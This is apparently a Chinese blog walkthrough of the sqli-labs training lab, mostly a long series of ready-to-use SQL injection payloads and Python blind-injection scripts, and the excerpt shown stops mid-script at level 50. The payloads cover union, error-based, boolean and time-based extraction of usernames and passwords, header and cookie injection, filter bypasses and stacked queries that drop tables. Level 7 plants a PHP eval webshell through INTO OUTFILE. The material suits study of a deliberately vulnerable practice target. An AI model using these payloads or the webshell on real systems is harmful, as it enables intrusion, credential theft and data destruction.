sqli-labs靶场

最新推荐文章于 2024-04-07 13:04:32 发布

风过江南乱

最新推荐文章于 2024-04-07 13:04:32 发布

阅读量431

点赞数 1

分类专栏： Web靶场

本文链接：https://blog.csdn.net/TM_1024/article/details/113817729

版权

Web靶场专栏收录该内容

2 篇文章 0 订阅

订阅专栏

一、前言

虽然之前刚开始学的时候已经打过一边，但当时可能懵懵懂懂，现在回过头来再过一遍。

用linux虚拟机docker直接一键，访问虚拟机ip80端口即可。

docker search sqli-labs  搜索镜像
docker pull acgpiano/sqli-labs 拉取镜像
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs 运行镜像。

建议都用手敲一遍。熟悉相关函数和指令。本文可能不会详细介绍分析详情只写payload，但如果有不懂的或有什么问题，直接留言即可，我会尽快回复。

二、正文

less-1

无过滤单引号闭合。

?id=0' union select 1,2,database()--+   查看数据库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-2

变量为整数型，同上。

?id=0 union select 1,2,database()--+   查看数据库
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-3

同less-1，只不过闭合方式多了个括号。

?id=0') union select 1,2,database()--+   查看数据库
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-4

同less-3，只不过单引号变双引号。

?id=0") union select 1,2,database()--+   查看数据库
?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0") union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-5

其实这里可以用布尔盲注的，但有回显还是用报错注入。

?id=0' and extractvalue(1,concat(1,(select database())))--+   查看数据库
?id=0' and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ 查看表
?id=0' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+ 查看字段
?id=0' and extractvalue(1,substring(concat(1,(select group_concat(username,0x3e,password) from users)),1,32))--+ 查看内容

同理

?id=0' and updatexml(1,concat(1,(select database())),1)--+
?id=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表
?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
?id=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容

less-6

同less-5，只不过单引号变双引号，试试floor函数报错。

?id=0" union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a--+   查看数据库
?id=0" union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看表
?id=0" union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看字段
?id=0" union select 1 from (select count(*),concat((select password from users limit 11,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看内容

还有exp报错。

?id=0" and exp(~(select * from(select database())a));--+   查看数据库
?id=0" and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a));--+ 查看表
?id=0" and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')a));--+ 查看字段
?id=0" and exp(~(select * from(select group_concat(username,0x3e,password) from users)a));--+ 查看内容

还有下面的也都可以

?id=0" and geometrycollection((select * from(select * from(select database())a)b))--+
?id=0" and multipoint((select * from(select * from(select database())a)b))--+
?id=0" and polygon((select * from(select * from(select database())a)b))--+
?id=0" and multipolygon((select * from(select * from(select database())a)b))--+
?id=0" and linestring((select * from(select * from(select database())a)b))--+
?id=0" and multilinestring((select * from(select * from(select database())a)b))--+

less-7

可以写一句话木马。然后用蚁剑连接就行。

?id=1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "/var/www/html/1.php" --+

对应的如果有回显可以读取文件

?id=0' union select 1,2,load_file('/flag')--+

less-8

布尔盲注

import requests

url = "http://192.168.0.4:84/Less-8/?id=0'||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "..........." in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-9

时间盲注

import requests

url = "http://192.168.0.4:84/Less-9/?id=0'||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-10

-同上时间盲注，只是将单引号换成双引号。

import requests

url = 'http://192.168.0.4:84/Less-10/?id=0"||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-11

最简单的POST联合注入，可以用浏览器插件HackBar。

uname=0' union select 1,database()--+&passwd=1    查看数据库
uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1   查看表
uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1  查看字段
uname=0' union select 1,group_concat(username,0x3e,password) from users--+&passwd=1    查看内容

less-12

同less-11，改变了闭合方式。

uname=0") union select 1,database()--+&passwd=1    查看数据库
uname=0") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1   查看表
uname=0") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1  查看字段
uname=0") union select 1,group_concat(username,0x3e,password) from users--+&passwd=1    查看内容

less-13

有报错回显，选择报错注入。

uname=0') and updatexml(1,concat(1,database()),2)--+&passwd=1    查看数据库
uname=0') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1   查看表
uname=0') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1  查看字段
uname=0') and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1    查看内容

less-14

有报错回显，选择报错注入。

uname=0" and updatexml(1,concat(1,database()),2)--+&passwd=1    查看数据库
uname=0" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1   查看表
uname=0" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1  查看字段
uname=0" and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1    查看内容

less-15

POST型时间盲注。

import requests

url = "http://192.168.3.39:84/Less-15/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data_database= {
            'uname': """admin' and if(ascii(substr(database(),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """admin' and if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }      
        try:
            r = requests.post(url, data=data_value, timeout=2)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-16

同less-15，将单引号换为了双引号和括号，可以试试布尔盲注。

import requests

url = "http://192.168.3.39:84/Less-16/"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data_database= {
            'uname': """0")||if(ascii(substr(database(),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """0")||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """0")||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """0")||if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        r = requests.post(url=url,data=data_value)
        if "flag.jpg" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-17

对uname有转义处理,所以注入点为passwd，同时最后查内容无法直接查看，嵌套一层子查询。

uname=admin&passwd=1' and updatexml(1,concat(1,database()),2)--+   查看数据库
uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   查看表
uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+  查看字段
uname=admin&passwd=1' and updatexml(1,concat(0x3e,(select password from (select password from users limit 3,1) aaa ),0x3e),1) --+    查看内容

less-18

报错注入，注入点在请求头headers信息中的User-Agent。用burp抓包修改，同时得POST传入uname=admin&passwd=admin。

User-Agent:0'||updatexml(1,concat(1,database()),1)--+'   查看数据库
User-Agent:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+'   查看表
User-Agent:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+'  查看字段
User-Agent:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+'    查看内容

less-19

报错注入，注入点在请求头headers信息中的Referer，同less-18。

Referer:0'||updatexml(1,concat(1,database()),1)--+'   查看数据库
Referer:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+'   查看表
Referer:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+'  查看字段
Referer:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+'    查看内容

less-20

直接联合注入，注入点在请求头headers信息中的cookie。

Cookie: uname=0' union select 1,2,database()--+   查看数据库
Cookie: uname=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
Cookie: uname=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+  查看字段
Cookie: uname=0' union select 1,2,group_concat(username,0x3e,password) from users--+    查看内容

less-21

联合注入，注入点在请求头headers信息中的cookie，只不过多了一个base64编码处理，闭合方式为单引号加括号。

Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=   查看数据库
Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSM=   查看表
Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyM=  查看字段
Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2UscGFzc3dvcmQpIGZyb20gdXNlcnMj    查看内容

less-22

联合注入，注入点在请求头headers信息中的cookie，只不过多了一个base64编码处理，闭合方式为单引号加括号。

Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==   查看数据库
Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==  查看表
Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw==  查看字段
Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzZSxwYXNzd29yZCkgZnJvbSB1c2VycyM=    查看内容

less-23

联合注入，过滤了注释符，有回显。

?id=0' union select 1,2,database()'   查看数据库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security    查看表
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users   查看字段
?id=0' union select 1,2,group_concat(username,0x3e,password) from users where '1   查看内容

less-24

二次注入。通过数据的存储和读取处理差异的不同来造成注入效果。
先注册admin'#用户，再修改密码，退出再以修改后的密码来登录admin用户。

less-25

过滤了or、and，直接联合注入也行，或者用||、&&代替，或者双写oorr、anandd绕过

?id=0' union select 1,2,database()'   查看数据库
?id=0' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security  查看表
?id=0' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users   查看字段
?id=0' union select 1,2,group_concat(username,0x3e,passwoorrd) from users where '1   查看内容

或者时间盲注，前面的脚本改改就能用。

import requests

url = 'http://192.168.3.39:84/Less-25/?id=0\' oorr '
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-25a

同上

?id=0 union select 1,2,database()--+   查看数据库
?id=0 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+    查看表
?id=0 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+   查看字段
?id=0 union select 1,2,group_concat(username,0x3e,passwoorrd) from users --+   查看内容

或者时间盲注，前面的脚本改改就能用。

import requests

url = 'http://192.168.3.39:84/Less-25a/?id=0 oorr '
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-26

过滤了空格和注释符和or，可以用括号风格和引号闭合，和双写绕过。

?id=0'||updatexml(1,concat(1,database()),1)||'0   查看数据库
?id=0'||updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1)||'0。  查看表
?id=0'||updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))),1)||'0    查看字段
?id=0'||updatexml(1,concat(1,(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),1,32))),1)||'0    查看内容

less-26a

同上，可以用布尔盲注

import requests

url = "http://192.168.3.39:84/Less-26a/?id=0')||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name="users")),%d,1))>%d,1,0)||(\'0'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),%d,1))>%d,1,0)||(\'0'%(i,mid)
        r = requests.get(url + payload)
        if "Dumb" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-27

过滤了union、select 等，大写绕过。

?id=0'%0aUNion%0aSElect%0a1,database(),3||'0  查看数据库
?id=0'%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||'0   查看表
?id=0'%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||'0    查看字段
?id=0'%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||'0  查看字段

less-27a

同上，单引号换双引号

?id=0"%0aUNion%0aSElect%0a1,database(),3||"0  查看数据库
?id=0"%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"0   查看表
?id=0"%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||"0    查看字段
?id=0"%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||"0  查看字段

less-28

过滤了union select 整体

?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0  查看数据库
?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0   查看表
?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0    查看字段
?id=0')%0auniounion %0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0  查看字段

less-28a

同less-28

?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0  查看数据库
?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0   查看表
?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0    查看字段
?id=0')%0auniounion%0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0  查看字段

less-29

不同web服务器解析规则不同。

?id=1&id=-1' union select 1,2,database() --+  查看数据库
?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=1&id=-1' union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-30

同less-29。

?id=1&id=-1" union select 1,2,database() --+  查看数据库
?id=1&id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=1&id=-1" union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-31

同less-29。

?id=1&id=-1") union select 1,2,database() --+  查看数据库
?id=1&id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=1&id=-1") union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-32

addslashes()转义。

?id=-1%bb' union select 1,2,database() --+  查看数据库
?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-33

同less-32。

?id=-1%bb' union select 1,2,database() --+  查看数据库
?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-34

同宽字节注入，用burp抓包修改。

uname=a%bb' union select 1,database()#&passwd=1&submit=Submit  查看数据库
uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit   查看表
uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit    查看字段
uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit  查看字段

less-35

整数型

?id=0 union select 1,2,database()--+  查看数据库
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+    查看字段
?id=0 union select 1,2,group_concat(username,0x3e,password) from users--+  查看字段

less-36

同less-32。

?id=-1%bb' union select 1,2,database() --+  查看数据库
?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   查看表
?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    查看字段
?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+  查看字段

less-37

同宽字节注入，用burp抓包修改。

uname=a%bb' union select 1,database()#&passwd=1&submit=Submit  查看数据库
uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit   查看表
uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit    查看字段
uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit  查看字段

less-38

堆叠注入，可以执行多条sql语句，查看数据库内容可以用联合注入，用;分割可执行任意sql语句。甚至是删除数据库;drop database security;--+

?id=0' union select 1,2,database()--+   查看数据库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-39

同less-38，整数型，可以执行任意sql语句。

?id=0 union select 1,2,database()--+   查看数据库
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-40

同less-38，单引号加括号闭合。

?id=0') union select 1,2,database()--+   查看数据库
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-41

同less-38，整型。

?id=0 union select 1,2,database()--+   查看数据库
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段
?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容

less-42

可以用前面的二次注入。可以堆叠注入，在llogin.php的password中，比如说复制一个表。
```
login_user=1&login_password=1';create table a like users;--+
```

less-43

同less-42，单引号加括号闭合。

login_user=1&login_password=1');create table a like users;--+

less-44

同less-42

login_user=1&login_password=1';create table a like users;--+

less-45

同less-43

login_user=1&login_password=1');drop table a;--+

less-46

order by从句。有报错回显，整型。

?sort=0 and updatexml(1,concat(1,(select database())),1)--+
?sort=0 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表
?sort=0 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
?sort=0 and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容

less-47

同 less46，单引号闭合

?sort=0' and updatexml(1,concat(1,(select database())),1)--+
?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表
?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容

less-48

时间盲注

import requests

url = 'http://192.168.3.39:84/Less-48/?sort=0||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-49

时间盲注

import requests

url = 'http://192.168.3.39:84/Less-49/?sort=0\'||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-50

时间盲注

import requests

url = 'http://192.168.3.39:84/Less-50/?sort=0||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
